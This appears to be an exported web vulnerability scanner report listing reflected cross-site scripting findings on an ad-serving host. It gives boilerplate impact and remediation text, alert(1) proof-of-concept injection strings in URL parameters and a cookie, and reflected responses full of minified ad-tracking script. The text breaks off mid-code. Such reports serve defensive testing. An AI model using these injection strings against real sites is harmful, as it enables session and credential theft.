]> 965199268496669696 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    64298'-alert(1)-'856b15d8bc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    '); document.write(''); ]]> false
    6481970524619731968 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    af27c<script>alert(1)</script>8f59dc632c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    alert(1)8f59dc632c6/idgt.technewsworld/home_below HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal; bkdp=1; qcms=1; cli=11c4bc59fd87e17; JY57=3LjyTUOLJDCESzPtVdU9eUE0yOWzsN33CiJtgRMLbrpLE-GaRmaKZGw; nadp=1; qcdp=1; ]]> alert(1)8f59dc632c6/idgt.technewsworld/home_below]]> false
    8576297755482835968 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    d30bc'-alert(1)-'f22b70c9b18 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    5){return null}var c=null;var b,e;for(b=d.length-1;b>=0;b--){c=d[b];e=c.nodeName;if((e=="OBJECT"||e=="IFRAME"||e=="IMG")&&c.width==a._w&&c.height==a.height){a._ob=c;break}else{if(e=="EMBED"&&((c.width==a._w&&c.height==a.height)||(c.style.width==a._w+"px"&&c.style.height==a.height+"px"))){a._ob=c;break}else{if(e=="DIV"||e=="A"){a._findUnit(c.childNodes,f);break}else{if(e=="FORM"){a._ob=c;break}}}}}return c};this.onLoad=function(){var b,c=0;a._findUnit(a.oDoc.childNodes,c);if(a._ob!==null){b=document.createElement("IMG");b.height=1;b.width=1;b.id="img"+a._id;document.body.appendChild(b);a.obj_init(a._ob);a._log("L")}};this.obj_init=function(c){this._ob=c;var b="img"+this._id;this._obi=document.getElementById(b);if(this._ob!==null){CollectiveMedia.addEvt(window,"beforeunload",this._e_b4);CollectiveMedia.addEvt(window,"blur",this._e_bl);CollectiveMedia.addEvt(window,"focus",this._e_scr);CollectiveMedia.addEvt(window,"unload",this._e_b4);CollectiveMedia.addEvt(window,"scroll",this._e_scr);CollectiveMedia.addEvt(window,"resize",this._e_scr);CollectiveMedia.addEvt(this._ob,"mouseover",this._e_in);CollectiveMedia.addEvt(this._ob,"mouseout",this._e_ou);CollectiveMedia.addEvt(this._ob,(this._ob.nodeName=="FORM"?"submit":"click"),this._e_cl);this._ps=fP(this._ob)}this._e_scr(null);this._to=window.setInterval(function(){a.checkViewTimeout()},15000)};this._e_in=function(b){if(a.ts==null){a.ts=new Date()}a._ic=a._ic+1};this._e_scr=function(c){var i,g,b,f,e,d,h=false;if(a._ob!==null&&a._ps!==null){a._ps=fP(a._ob);b=getWS();f=getXY();e=(Math.round(a._ps[1])+Math.round(a._ob.height));d=(Math.round(a._ps[0])+Math.round(a._ob.width));if((Math.round(b[1])+Math.round(f[1])>Math.round(a._ps[1]))&&(f[1]Math.round(a._ps[0]))&&(f[0]f[1]&&e<(f[1]+b[1])){i=true}if(a._ps[0]>f[0]&&d<(f[0]+b[0])){g=true}if(g&&i){if(!a.fFV){a.fFV=true;h=true}}}else{a._vt_0();if(a._vt>a._vtl){a._log("H")}}}if(h||a.nLg==0){a._log("V")}};this._vt_0=function(){if(a.tsV!=null){a.teV=new Date();var b=a.teV.getTime()-a.tsV.getTime();a.teV.setTime(b);a.tsV=null;a._vt+=Math.round(b/1000)}a._it_0()};this._it_0=function(){if(a.ts!=null){a.te=new Date();var b=a.te.getTime()-a.ts.getTime();a.te.setTime(b);a.ts=null;a._it+=Math.round(b/1000)}};this._e_ou=function(b){a._vt_0();a._log("I");a._e_scr()};this._e_b4=function(c){if(a._to!=null){window.clearInterval(a._to);a._to=null}a._vt_0();a._log("U");a.done=true;var d=new Date(),e=0,b;e=0;while(e<200){b=new Date();e=b.getTime()-d.getTime()}};this._e_cl=function(b){a._ic=a._ic+1;a._vt_0();a._log("C");a._e_scr();return true};this._e_bl=function(b){a._vt_0();a._log("B");a._e_scr()};this.checkViewTimeout=function(){if(a.tsV!=null){var b=new Date();var c=b.getTime()-a.tsV.getTime();b.setTime(c);var d=a._vt+Math.round(c/1000);if(d>=a.mxVT){a._e_b4()}else{if(d>a._vtl){a._e_bl()}}}};this.getLogData=function(b){str="tx="+a._id+";it="+(a._it)+";vt="+(a._vt)+";ic="+(a._ic)+";atf="+(a.fATF?"1":"0")+";pv="+(a.fV?"1":"0")+";fv="+(a.fFV?"1":"0")+";seq="+(a.nLg)+";et="+b+";ord="+CollectiveMedia.rand(1000000);if(!/\?$/.test(str)){str+="?"}return str};this.getLogUrl=function(b){if(b==null){b="U"}url=location.protocol+"//l.collective-media.net/log;"+a.getLogData(b);return url};this._log=function(b){if(!a.done){a.nLg++;if(a._obi){a._obi.src=a.getLogUrl(b);a._vtl=a._vt}}}}function fP(b){var c=fPX(b);var a=fPY(b);return[c,a]}function fPX(a){var b=0;if(a.offsetParent){while(1){b+=a.offsetLeft;if(!a.offsetParent){break}a=a.offsetParent}}else{if(a.x){b+=a.x}}return b}function fPY(b){var a=0;if(b.offsetParent){while(1){a+=b.offsetTop;if(!b.offsetParent){break}b=b.offsetParent}}else{if(b.y){a+=b.y}}return a}function getWS(){var a=0,b=0;if(typeof(window.innerWidth)=="number"){a=window.innerWidth;b=window.innerHeight}else{if(document.documentElement&&(document.documentElement.clientWidth||document.documentElement.clientHeight)){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else{if(document.body&&(document.body.clientWidth||document.body.clientHeight)){a=document.body.clientWidth;b=document.body.clientHeight}}}return[a,b]}function getXY(){var b=0,a=0;if(typeof(window.pageYOffset)=="number"){a=window.pageYOffset;b=window.pageXOffset}else{if(document.body&&(document.body.scrollLeft||document.body.scrollTop)){a=document.body.scrollTop;b=document.body.scrollLeft}else{if(document.documentElement&&(document.documentElement.scrollLeft||document.documentElement.scrollTop)){a=document.documentElement.scrollTop;b=document.documentElement.scrollLeft}}}return[b,a]}var CollectiveMedia={rand:function(a){return Math.floor(Math.random()*a)},appendChild:function(a,b){if(null==a.canHaveChildren||a.canHaveChildren){a.appendChild(document.createTextNode(b))}else{a.text=b}},createAndAttachAd:function(h,c,a,e,f){var g=document.getElementsByTagName("script");var b=g[g.length-1];if(b==null){return}var i=document.createElement("script");i.language="javascript";i.setAttribute("type","text/javascript");var j="document.write('');";b.parentNode.insertBefore(i,b);CollectiveMedia.appendChild(i,j);if(f){var d=new cmIV_();d._init(h,i.parentNode,a,e);return d}},addPixel:function(a){CollectiveMedia.addEvt(window,"load",function(){img=document.createElement("img");img.src=a;CollectiveMedia.appendChild(img)})},addTrackingImages:function(){CollectiveMedia.trackingImages=arguments;CollectiveMedia.addEvt(window,"load",CollectiveMedia.loadTrackingImages)},loadTrackingImages:function(){var a=CollectiveMedia.trackingImages,c="?";c+=CollectiveMedia.rand(1000000);for(var b=0;bCollectiveMedia.createAndAttachAd("idgt-94536534_1289162296","http://vulnerable.ad.partner//idgt.technewsworldd30bc'-alert(1)-'f22b70c9b18/home_below;net=idgt;u=,idgt-94536534_1289162296,11c4bc59fd87e17,none,idgt.virtualization_l;;contx=none;dc=d;btg=idgt.virtualization_l?","0","0",false);');var __cs_c1 = 8; var __cs_c2 = "6035308"; var __cs_c3 = ""; var __cs_c4 = ""; var __cs_c5 = ""; var __cs_c6 = ""; var __cs_c10 = ""; var __cs_c15 = ""; var __cs_params = ["c1=", __cs_c1, "&c2=", __cs_c2, "&c3=", __cs_c3, "&c4=", __cs_c4, "&c5=", __cs_c5, "&c6=", __cs_c6, "&c10=", __cs_c10, "&c15=", __cs_c15].join(''); document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js?" + __cs_params +"'%3E%3C/script%3E")); ]]> false
    4946232334126131200 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    6b839'-alert(1)-'ab8992417ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    5){return null}var c=null;var b,e;for(b=d.length-1;b>=0;b--){c=d[b];e=c.nodeName;if((e=="OBJECT"||e=="IFRAME"||e=="IMG")&&c.width==a._w&&c.height==a.height){a._ob=c;break}else{if(e=="EMBED"&&((c.width==a._w&&c.height==a.height)||(c.style.width==a._w+"px"&&c.style.height==a.height+"px"))){a._ob=c;break}else{if(e=="DIV"||e=="A"){a._findUnit(c.childNodes,f);break}else{if(e=="FORM"){a._ob=c;break}}}}}return c};this.onLoad=function(){var b,c=0;a._findUnit(a.oDoc.childNodes,c);if(a._ob!==null){b=document.createElement("IMG");b.height=1;b.width=1;b.id="img"+a._id;document.body.appendChild(b);a.obj_init(a._ob);a._log("L")}};this.obj_init=function(c){this._ob=c;var b="img"+this._id;this._obi=document.getElementById(b);if(this._ob!==null){CollectiveMedia.addEvt(window,"beforeunload",this._e_b4);CollectiveMedia.addEvt(window,"blur",this._e_bl);CollectiveMedia.addEvt(window,"focus",this._e_scr);CollectiveMedia.addEvt(window,"unload",this._e_b4);CollectiveMedia.addEvt(window,"scroll",this._e_scr);CollectiveMedia.addEvt(window,"resize",this._e_scr);CollectiveMedia.addEvt(this._ob,"mouseover",this._e_in);CollectiveMedia.addEvt(this._ob,"mouseout",this._e_ou);CollectiveMedia.addEvt(this._ob,(this._ob.nodeName=="FORM"?"submit":"click"),this._e_cl);this._ps=fP(this._ob)}this._e_scr(null);this._to=window.setInterval(function(){a.checkViewTimeout()},15000)};this._e_in=function(b){if(a.ts==null){a.ts=new Date()}a._ic=a._ic+1};this._e_scr=function(c){var i,g,b,f,e,d,h=false;if(a._ob!==null&&a._ps!==null){a._ps=fP(a._ob);b=getWS();f=getXY();e=(Math.round(a._ps[1])+Math.round(a._ob.height));d=(Math.round(a._ps[0])+Math.round(a._ob.width));if((Math.round(b[1])+Math.round(f[1])>Math.round(a._ps[1]))&&(f[1]Math.round(a._ps[0]))&&(f[0]f[1]&&e<(f[1]+b[1])){i=true}if(a._ps[0]>f[0]&&d<(f[0]+b[0])){g=true}if(g&&i){if(!a.fFV){a.fFV=true;h=true}}}else{a._vt_0();if(a._vt>a._vtl){a._log("H")}}}if(h||a.nLg==0){a._log("V")}};this._vt_0=function(){if(a.tsV!=null){a.teV=new Date();var b=a.teV.getTime()-a.tsV.getTime();a.teV.setTime(b);a.tsV=null;a._vt+=Math.round(b/1000)}a._it_0()};this._it_0=function(){if(a.ts!=null){a.te=new Date();var b=a.te.getTime()-a.ts.getTime();a.te.setTime(b);a.ts=null;a._it+=Math.round(b/1000)}};this._e_ou=function(b){a._vt_0();a._log("I");a._e_scr()};this._e_b4=function(c){if(a._to!=null){window.clearInterval(a._to);a._to=null}a._vt_0();a._log("U");a.done=true;var d=new Date(),e=0,b;e=0;while(e<200){b=new Date();e=b.getTime()-d.getTime()}};this._e_cl=function(b){a._ic=a._ic+1;a._vt_0();a._log("C");a._e_scr();return true};this._e_bl=function(b){a._vt_0();a._log("B");a._e_scr()};this.checkViewTimeout=function(){if(a.tsV!=null){var b=new Date();var c=b.getTime()-a.tsV.getTime();b.setTime(c);var d=a._vt+Math.round(c/1000);if(d>=a.mxVT){a._e_b4()}else{if(d>a._vtl){a._e_bl()}}}};this.getLogData=function(b){str="tx="+a._id+";it="+(a._it)+";vt="+(a._vt)+";ic="+(a._ic)+";atf="+(a.fATF?"1":"0")+";pv="+(a.fV?"1":"0")+";fv="+(a.fFV?"1":"0")+";seq="+(a.nLg)+";et="+b+";ord="+CollectiveMedia.rand(1000000);if(!/\?$/.test(str)){str+="?"}return str};this.getLogUrl=function(b){if(b==null){b="U"}url=location.protocol+"//l.collective-media.net/log;"+a.getLogData(b);return url};this._log=function(b){if(!a.done){a.nLg++;if(a._obi){a._obi.src=a.getLogUrl(b);a._vtl=a._vt}}}}function fP(b){var c=fPX(b);var a=fPY(b);return[c,a]}function fPX(a){var b=0;if(a.offsetParent){while(1){b+=a.offsetLeft;if(!a.offsetParent){break}a=a.offsetParent}}else{if(a.x){b+=a.x}}return b}function fPY(b){var a=0;if(b.offsetParent){while(1){a+=b.offsetTop;if(!b.offsetParent){break}b=b.offsetParent}}else{if(b.y){a+=b.y}}return a}function getWS(){var a=0,b=0;if(typeof(window.innerWidth)=="number"){a=window.innerWidth;b=window.innerHeight}else{if(document.documentElement&&(document.documentElement.clientWidth||document.documentElement.clientHeight)){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else{if(document.body&&(document.body.clientWidth||document.body.clientHeight)){a=document.body.clientWidth;b=document.body.clientHeight}}}return[a,b]}function getXY(){var b=0,a=0;if(typeof(window.pageYOffset)=="number"){a=window.pageYOffset;b=window.pageXOffset}else{if(document.body&&(document.body.scrollLeft||document.body.scrollTop)){a=document.body.scrollTop;b=document.body.scrollLeft}else{if(document.documentElement&&(document.documentElement.scrollLeft||document.documentElement.scrollTop)){a=document.documentElement.scrollTop;b=document.documentElement.scrollLeft}}}return[b,a]}var CollectiveMedia={rand:function(a){return Math.floor(Math.random()*a)},appendChild:function(a,b){if(null==a.canHaveChildren||a.canHaveChildren){a.appendChild(document.createTextNode(b))}else{a.text=b}},createAndAttachAd:function(h,c,a,e,f){var g=document.getElementsByTagName("script");var b=g[g.length-1];if(b==null){return}var i=document.createElement("script");i.language="javascript";i.setAttribute("type","text/javascript");var j="document.write('');";b.parentNode.insertBefore(i,b);CollectiveMedia.appendChild(i,j);if(f){var d=new cmIV_();d._init(h,i.parentNode,a,e);return d}},addPixel:function(a){CollectiveMedia.addEvt(window,"load",function(){img=document.createElement("img");img.src=a;CollectiveMedia.appendChild(img)})},addTrackingImages:function(){CollectiveMedia.trackingImages=arguments;CollectiveMedia.addEvt(window,"load",CollectiveMedia.loadTrackingImages)},loadTrackingImages:function(){var a=CollectiveMedia.trackingImages,c="?";c+=CollectiveMedia.rand(1000000);for(var b=0;bCollectiveMedia.createAndAttachAd("idgt-90700057_1289163510","http://vulnerable.ad.partner/adj6b839'-alert(1)-'ab8992417ab/idgt.technewsworld/home_above;net=idgt;u=,idgt-90700057_1289163510,11c4bc59fd87e17,virtualization,idgt.virtualization_h-idgt.virtualization_l-idgt.virtualization_m;;sec=home;fold=above;tile=3;cmw=owl;sz=300x250;net=idgt;ord1=333483;contx=virtualization;dc=d;btg=idgt.virtualization_h;btg=idgt.virtualization_l;btg=idgt.virtualization_m;ord=7841097520626027?","300","250",false);');var __cs_c1 = 8; var __cs_c2 = "6035308"; var __cs_c3 = ""; var __cs_c4 = ""; var __cs_c5 = ""; var __cs_c6 = ""; var __cs_c10 = ""; var __cs_c15 = ""; var __cs_params = ["c1=", __cs_c1, "&c2=", __cs_c2, "&c3=", __cs_c3, "&c4=", __cs_c4, "&c5=", __cs_c5, "&c6=", __cs_c6, "&c10=", __cs_c10, "&c15=", __cs_c15].join(''); document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js?" + __cs_params +"'%3E%3C/script%3E")); CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif");CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii93kdn349&reppipe=,&edr=off&repequal=_&ru=http%3A%2F%2Fa.collective-media.net%2Fdatapair%3Fnet%3Dna%26pasv%3D0%26id%3D%3Cna_id%3E%26pid%3D%3Cna_mp%3E%26segs%3D%3Cna_da%3E");]]> false
    6581119175775046656 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    3c45d'-alert(1)-'dffdf01be9 was submitted in the sec parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    '); document.write(''); ]]> false
    2995191648361413632 2097920 Cross-site scripting (reflected) http://a.collective-media.net Information Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    c79d4'%3balert(1)//0683d2a73ec was submitted in the cli cookie. This input was echoed as c79d4';alert(1)//0683d2a73ec in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

    Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.]]>
    5){return null}var c=null;var b,e;for(b=d.length-1;b>=0;b--){c=d[b];e=c.nodeName;if((e=="OBJECT"||e=="IFRAME"||e=="IMG")&&c.width==a._w&&c.height==a.height){a._ob=c;break}else{if(e=="EMBED"&&((c.width==a._w&&c.height==a.height)||(c.style.width==a._w+"px"&&c.style.height==a.height+"px"))){a._ob=c;break}else{if(e=="DIV"||e=="A"){a._findUnit(c.childNodes,f);break}else{if(e=="FORM"){a._ob=c;break}}}}}return c};this.onLoad=function(){var b,c=0;a._findUnit(a.oDoc.childNodes,c);if(a._ob!==null){b=document.createElement("IMG");b.height=1;b.width=1;b.id="img"+a._id;document.body.appendChild(b);a.obj_init(a._ob);a._log("L")}};this.obj_init=function(c){this._ob=c;var b="img"+this._id;this._obi=document.getElementById(b);if(this._ob!==null){CollectiveMedia.addEvt(window,"beforeunload",this._e_b4);CollectiveMedia.addEvt(window,"blur",this._e_bl);CollectiveMedia.addEvt(window,"focus",this._e_scr);CollectiveMedia.addEvt(window,"unload",this._e_b4);CollectiveMedia.addEvt(window,"scroll",this._e_scr);CollectiveMedia.addEvt(window,"resize",this._e_scr);CollectiveMedia.addEvt(this._ob,"mouseover",this._e_in);CollectiveMedia.addEvt(this._ob,"mouseout",this._e_ou);CollectiveMedia.addEvt(this._ob,(this._ob.nodeName=="FORM"?"submit":"click"),this._e_cl);this._ps=fP(this._ob)}this._e_scr(null);this._to=window.setInterval(function(){a.checkViewTimeout()},15000)};this._e_in=function(b){if(a.ts==null){a.ts=new Date()}a._ic=a._ic+1};this._e_scr=function(c){var i,g,b,f,e,d,h=false;if(a._ob!==null&&a._ps!==null){a._ps=fP(a._ob);b=getWS();f=getXY();e=(Math.round(a._ps[1])+Math.round(a._ob.height));d=(Math.round(a._ps[0])+Math.round(a._ob.width));if((Math.round(b[1])+Math.round(f[1])>Math.round(a._ps[1]))&&(f[1]Math.round(a._ps[0]))&&(f[0]f[1]&&e<(f[1]+b[1])){i=true}if(a._ps[0]>f[0]&&d<(f[0]+b[0])){g=true}if(g&&i){if(!a.fFV){a.fFV=true;h=true}}}else{a._vt_0();if(a._vt>a._vtl){a._log("H")}}}if(h||a.nLg==0){a._log("V")}};this._vt_0=function(){if(a.tsV!=null){a.teV=new Date();var b=a.teV.getTime()-a.tsV.getTime();a.teV.setTime(b);a.tsV=null;a._vt+=Math.round(b/1000)}a._it_0()};this._it_0=function(){if(a.ts!=null){a.te=new Date();var b=a.te.getTime()-a.ts.getTime();a.te.setTime(b);a.ts=null;a._it+=Math.round(b/1000)}};this._e_ou=function(b){a._vt_0();a._log("I");a._e_scr()};this._e_b4=function(c){if(a._to!=null){window.clearInterval(a._to);a._to=null}a._vt_0();a._log("U");a.done=true;var d=new Date(),e=0,b;e=0;while(e<200){b=new Date();e=b.getTime()-d.getTime()}};this._e_cl=function(b){a._ic=a._ic+1;a._vt_0();a._log("C");a._e_scr();return true};this._e_bl=function(b){a._vt_0();a._log("B");a._e_scr()};this.checkViewTimeout=function(){if(a.tsV!=null){var b=new Date();var c=b.getTime()-a.tsV.getTime();b.setTime(c);var 